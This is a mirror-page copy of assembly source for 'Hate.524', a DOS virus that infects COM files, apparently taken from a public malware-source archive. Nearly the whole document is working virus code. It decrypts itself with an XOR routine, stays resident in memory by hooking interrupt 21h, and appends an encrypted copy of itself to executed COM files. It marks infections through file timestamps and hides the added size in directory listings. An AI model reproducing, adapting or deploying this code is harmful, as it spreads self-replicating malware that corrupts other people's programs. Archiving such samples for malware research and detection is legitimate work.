mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
300 lines
9.8 KiB
NASM
300 lines
9.8 KiB
NASM
|
; Hate.524 (named by Moi because of Internal Text and Size)
|
||
|
; Uninteresting Encrypted COM Infector
|
||
|
; Source code compliments of PakiLad
|
||
|
p386n
|
||
|
|
||
|
|
||
|
seg000 segment byte public 'CODE' use16
|
||
|
assume cs:seg000
|
||
|
org 100h
|
||
|
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
|
||
|
|
||
|
start proc near
|
||
|
and al, 21h
|
||
|
mov ax, 5800h
|
||
|
int 21h ; Virus Installation Check
|
||
|
cmp ah, 58h ; Installed Already?
|
||
|
jnz InstallVirus ; No? Then JMP.
|
||
|
mov ah, 4Ch
|
||
|
int 21h ; Exit To DOS
|
||
|
|
||
|
InstallVirus:
|
||
|
call $+3
|
||
|
start endp
|
||
|
|
||
|
Next proc near
|
||
|
pop si
|
||
|
sub si, offset Next
|
||
|
mov dl, Cryptor[si]
|
||
|
cmp dl, 0
|
||
|
jz Crypted
|
||
|
mov cx, VirusSize
|
||
|
lea di, Crypted[si]
|
||
|
|
||
|
DecryptLoop:
|
||
|
mov al, [di]
|
||
|
xor al, dl
|
||
|
mov [di], al
|
||
|
inc di
|
||
|
loop DecryptLoop
|
||
|
|
||
|
Crypted:
|
||
|
mov ah, 14h
|
||
|
int 21h ; Install Check
|
||
|
cmp ah, 6 ; Installed?
|
||
|
jz RestoreCOM ; Yes? Then JMP.
|
||
|
jmp short DoInstall
|
||
|
|
||
|
RestoreCOM:
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ax, OrgByte1[si]
|
||
|
mov word ptr start, ax
|
||
|
mov ax, OrgByte2[si]
|
||
|
mov word ptr ds:102h, ax
|
||
|
mov al, OrgByte3[si]
|
||
|
mov byte ptr ds:104h, al
|
||
|
mov ax, offset start
|
||
|
push ax
|
||
|
retn ; Return to Original Program
|
||
|
|
||
|
DoInstall:
|
||
|
mov ah, 52h
|
||
|
int 21h ; Get List Of Lists
|
||
|
mov bx, es:[bx-2]
|
||
|
|
||
|
FindLastMCB:
|
||
|
mov es, bx
|
||
|
add bx, es:3
|
||
|
inc bx
|
||
|
cmp byte ptr es:0, 'Z' ; Last MCB?
|
||
|
jnz FindLastMCB ; No? Then JMP.
|
||
|
mov ax, es
|
||
|
mov es, bx
|
||
|
cmp byte ptr es:0, 'M' ; More MCB To Follow?
|
||
|
jz GotMoreMCB ; Yes? Then JMP.
|
||
|
mov es, ax ; ES points to MCB
|
||
|
jmp short GotMemory
|
||
|
|
||
|
GotMoreMCB:
|
||
|
mov es, bx
|
||
|
add bx, es:3
|
||
|
inc bx
|
||
|
cmp byte ptr es:0, 'M'
|
||
|
jz GotMoreMCB
|
||
|
|
||
|
GotMemory:
|
||
|
mov bx, es:3
|
||
|
mov ax, 795
|
||
|
mov cl, 4
|
||
|
shr ax, cl
|
||
|
sub bx, ax
|
||
|
mov es:3, bx
|
||
|
mov ax, es
|
||
|
add bx, ax
|
||
|
xor di, di
|
||
|
mov es, bx
|
||
|
mov cx, TotalSize+100h
|
||
|
push si
|
||
|
rep movsb ; Copy Virus Into Memory
|
||
|
pop si
|
||
|
push es
|
||
|
pop ds
|
||
|
mov ax, 3521h
|
||
|
int 21h ; Get Int 21h Vectors
|
||
|
mov Int21Ofs, bx
|
||
|
mov Int21Seg, es
|
||
|
mov ah, 25h
|
||
|
mov dx, offset NewInt21
|
||
|
int 21h ; Set New Int 21h Vectors
|
||
|
jmp RestoreCOM
|
||
|
Next endp
|
||
|
|
||
|
|
||
|
NewInt21: ; Install Check?
|
||
|
cmp ah, 14h
|
||
|
jnz CheckExecute ; No? Then JMP.
|
||
|
mov ah, 6 ; I'm Here!
|
||
|
iret
|
||
|
|
||
|
CheckExecute: ; Set Execution State?
|
||
|
cmp ah, 4Bh
|
||
|
jnz CheckFCBFind ; No? Then JMP.
|
||
|
jmp short InfectFile
|
||
|
|
||
|
CheckFCBFind: ; Find First File (FCB)?
|
||
|
cmp ah, 11h
|
||
|
jz FindFileFCB ; Yes? Then JMP.
|
||
|
cmp ah, 12h ; Find Next File (FCB)?
|
||
|
jnz DoOriginalFunc ; No? Then JMP.
|
||
|
|
||
|
FindFileFCB:
|
||
|
call CallInt21
|
||
|
pushf
|
||
|
pusha
|
||
|
push es
|
||
|
cmp al, 0 ; None found?
|
||
|
jnz NoFilesFound ; No? Then JMP.
|
||
|
mov ah, 2Fh
|
||
|
call CallInt21 ; Get DTA Segment/Offset
|
||
|
cmp byte ptr es:[bx], 0FFh ; Extended FCB?
|
||
|
jnz NotExtFCB ; No? Then JMP.
|
||
|
add bx, 7
|
||
|
|
||
|
NotExtFCB:
|
||
|
mov al, es:[bx+17h]
|
||
|
and al, 1Fh
|
||
|
cmp al, 1Fh ; Infected Already?
|
||
|
jnz NoFilesFound ; No? Then JMP.
|
||
|
sub word ptr es:[bx+1Dh], TotalSize ; Fix FileSize
|
||
|
|
||
|
NoFilesFound:
|
||
|
pop es
|
||
|
popa
|
||
|
popf
|
||
|
iret
|
||
|
|
||
|
DoOriginalFunc:
|
||
|
jmp short $+2
|
||
|
JMPFar21 db 0EAh
|
||
|
Int21Ofs dw 0
|
||
|
Int21Seg dw 0
|
||
|
|
||
|
InfectFile:
|
||
|
pusha
|
||
|
push es
|
||
|
push ds
|
||
|
mov ax, 3D02h
|
||
|
call CallInt21 ; Open File
|
||
|
jnb FileOpened ; No problems? Then JMP.
|
||
|
jmp CloseFile
|
||
|
|
||
|
FileOpened:
|
||
|
xchg ax, bx
|
||
|
push cs
|
||
|
pop ds ; DS = CS
|
||
|
mov ah, 3Fh
|
||
|
mov cx, 5
|
||
|
mov dx, offset OrgByte1
|
||
|
call CallInt21 ; Read In 5 Bytes
|
||
|
mov ax, OrgByte1
|
||
|
add ah, al
|
||
|
cmp ah, 0A7h ; Infected Already?
|
||
|
jnz NotBad1 ; No? Then JMP.
|
||
|
jmp CloseFile
|
||
|
|
||
|
NotBad1: ; Infected Already?
|
||
|
cmp ah, 45h
|
||
|
jnz NoSigFound ; No? Then JMP.
|
||
|
jmp CloseFile
|
||
|
|
||
|
NoSigFound:
|
||
|
mov ax, 5700h
|
||
|
call CallInt21 ; Get File Date/Time
|
||
|
push cx
|
||
|
push dx
|
||
|
and cx, 1Fh
|
||
|
cmp cx, 1Fh ; Infected Already?
|
||
|
jnz MovePtrEnd ; No? Then JMP.
|
||
|
pop dx
|
||
|
pop cx
|
||
|
jmp short CloseFile
|
||
|
|
||
|
MovePtrEnd:
|
||
|
mov ax, 4202h
|
||
|
xor cx, cx
|
||
|
cwd
|
||
|
call CallInt21 ; Move Pointer to End of File
|
||
|
sub ax, 3 ; Calculate JMP Offset
|
||
|
mov JMPOffset, ax
|
||
|
mov ah, 40h
|
||
|
mov cx, CryptSize
|
||
|
mov dx, offset start
|
||
|
call CallInt21 ; Write Crypt Routine to File
|
||
|
mov cx, VirusSize
|
||
|
mov si, offset Crypted
|
||
|
mov di, offset EndOfVirus
|
||
|
mov ax, 8F20h
|
||
|
push es
|
||
|
push ax
|
||
|
pop es
|
||
|
assume es:nothing
|
||
|
in al, 40h ; Get Random Number
|
||
|
xchg al, dl
|
||
|
mov Cryptor, dl
|
||
|
|
||
|
EncryptVirus:
|
||
|
mov al, [si]
|
||
|
xor al, dl
|
||
|
mov es:[di], al
|
||
|
inc si
|
||
|
inc di
|
||
|
loop EncryptVirus
|
||
|
mov cx, 1
|
||
|
|
||
|
EncryptSecond:
|
||
|
mov al, [si]
|
||
|
mov es:[di], al
|
||
|
inc si
|
||
|
inc di
|
||
|
loop EncryptSecond
|
||
|
pop es
|
||
|
assume es:nothing
|
||
|
push ds
|
||
|
mov ax, 8F20h
|
||
|
push ax
|
||
|
pop ds
|
||
|
assume ds:nothing
|
||
|
mov ah, 40h
|
||
|
mov cx, VirusSize2
|
||
|
mov dx, offset EndOfVirus
|
||
|
call CallInt21 ; Write Encrypted Virus To File
|
||
|
pop ds
|
||
|
assume ds:seg000
|
||
|
mov ax, 4200h
|
||
|
xor cx, cx
|
||
|
cwd
|
||
|
call CallInt21 ; Move Pointer to Beginning
|
||
|
mov ah, 40h
|
||
|
mov cl, 5
|
||
|
mov dx, offset InfMarker
|
||
|
call CallInt21 ; Write JMP And Infection Marker
|
||
|
pop dx
|
||
|
pop cx
|
||
|
or cx, 1Fh
|
||
|
mov ax, 5701h
|
||
|
call CallInt21 ; Fix File Date/Time
|
||
|
|
||
|
CloseFile:
|
||
|
mov ah, 3Eh
|
||
|
call CallInt21 ; Close File
|
||
|
pop ds
|
||
|
pop es
|
||
|
popa
|
||
|
jmp near ptr JMPFar21
|
||
|
|
||
|
CallInt21 proc near
|
||
|
pushf
|
||
|
call dword ptr cs:Int21Ofs
|
||
|
retn
|
||
|
CallInt21 endp
|
||
|
|
||
|
OrgByte1 dw 2124h
|
||
|
OrgByte2 dw 20CDh
|
||
|
OrgByte3 db 0
|
||
|
InfMarker dw 2124h
|
||
|
JMPInstruction db 0E9h
|
||
|
JMPOffset dw 0
|
||
|
VirusName db 'THIS IS [HATE V1.0] VIRUS$'
|
||
|
|
||
|
Cryptor db 0
|
||
|
EndOfVirus:
|
||
|
CryptSize equ Crypted - start
|
||
|
VirusSize equ Cryptor - Crypted
|
||
|
VirusSize2 equ $ - Crypted
|
||
|
TotalSize equ $ - start
|
||
|
seg000 ends
|
||
|
|
||
|
|
||
|
end start
|